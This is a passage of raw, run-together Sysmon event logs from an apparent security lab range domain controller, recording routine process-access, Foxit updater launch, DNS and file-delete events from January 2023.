Software\Foxit PDF Reader\FoxitPDFReader.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.439{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.439{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.439{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.439{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.439{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.439{FE4C2B44-E326-63C7-F905-00000000AF02}32606896C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+d856c(wow64)|C:\Windows\System32\windows.storage.dll+1c6716(wow64)|C:\Windows\System32\windows.storage.dll+1c63d1(wow64)|C:\Windows\System32\windows.storage.dll+1c64a3(wow64)|C:\Windows\System32\windows.storage.dll+1c7175(wow64)|C:\Windows\System32\windows.storage.dll+1c6021(wow64)|C:\Windows\System32\windows.storage.dll+1c8182(wow64)|C:\Windows\System32\windows.storage.dll+1c85ec(wow64)|C:\Windows\System32\windows.storage.dll+1c8035(wow64)|C:\Windows\System32\SHELL32.dll+1a9394(wow64)|C:\Windows\System32\SHELL32.dll+1a926e(wow64)|C:\Windows\System32\SHELL32.dll+1431da(wow64)|C:\Windows\System32\shcore.dll+2fffa(wow64) 154100x800000000000000039507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.396{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe12.1.0.15192Foxit UpdaterFoxit UpdaterFoxit CorporationFoxit Updater.EXE"C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe" -updater -type "Auto Updater" -hwnd 66498 -bnoshowtip -readerpath "C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\" -regpath "HKEY_CURRENT_USER\Software\Foxit Software\Foxit PDF Reader 12.0" -version "12.1.0.15250" -readerlang "en-US" -UpdateMode "1"C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=9968A58D93AF316E2D4EA79B0CCCF0FB,SHA256=3D79910A9B723D8B923AD7463BE373A9147745B743F5B03F7ABC25201CBC86DB,IMPHASH=BD3F29B8D5BB0B0238E0071DCEF6C8FA{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe"C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe" 10341000x800000000000000039506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.386{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000039505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localEXE2023-01-18 12:16:44.331{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe2023-01-18 12:16:44.331 23542300x800000000000000039504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.179{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FD3444983C7F4E69301D0643DD9F2B3,SHA256=FB88EC6B06680229BA53F62D3F13F8091040D64250C7978189605F495FBF9B0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.938{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.921{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E32D-63C7-FB05-00000000AF02}6996C:\Program Files\Mozilla Firefox\pingsender.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.921{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E32D-63C7-FB05-00000000AF02}6996C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.827{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E32D-63C7-FC05-00000000AF02}1844C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.827{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E32D-63C7-FC05-00000000AF02}1844C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.709{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=204E80A2F4588750C3A4F43FB8790212,SHA256=477F0DAFEFB2B010B51345DA7A18494353952D03124B8A6ADF8A91F5F635C110,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.709{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA13304AAEB72731B29B2B6F5305CD37,SHA256=78C30DB9D5789F8232BC8D2CB5FE16A5EBA25AC1F590E9387149A2C1402A703D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000039594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.145{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64489- 354300x800000000000000039593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.112{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64489- 10341000x800000000000000039592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.613{FE4C2B44-E32D-63C7-FC05-00000000AF02}18441944C:\Windows\system32\conhost.exe{FE4C2B44-E32D-63C7-FB05-00000000AF02}6996C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.559{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.559{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.559{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.559{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.559{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.521{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-E1F1-63C7-9405-00000000AF02}352C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.496{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=1416AF39515F603B585851FFF452CBF5,SHA256=395AA423C8EA47B5B015E9BD4607412C550B83218077BDC73F4D0951F13444DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.495{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E32D-63C7-FC05-00000000AF02}1844C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x800000000000000039583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.494{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=BC27F57079DF8BF901D14291DC1B5CA2,SHA256=656C2679AD2E766A183D3FA74A796738348CB2B1C7F26822CA70EB0772E329FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.489{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E32D-63C7-FB05-00000000AF02}6996C:\Program Files\Mozilla 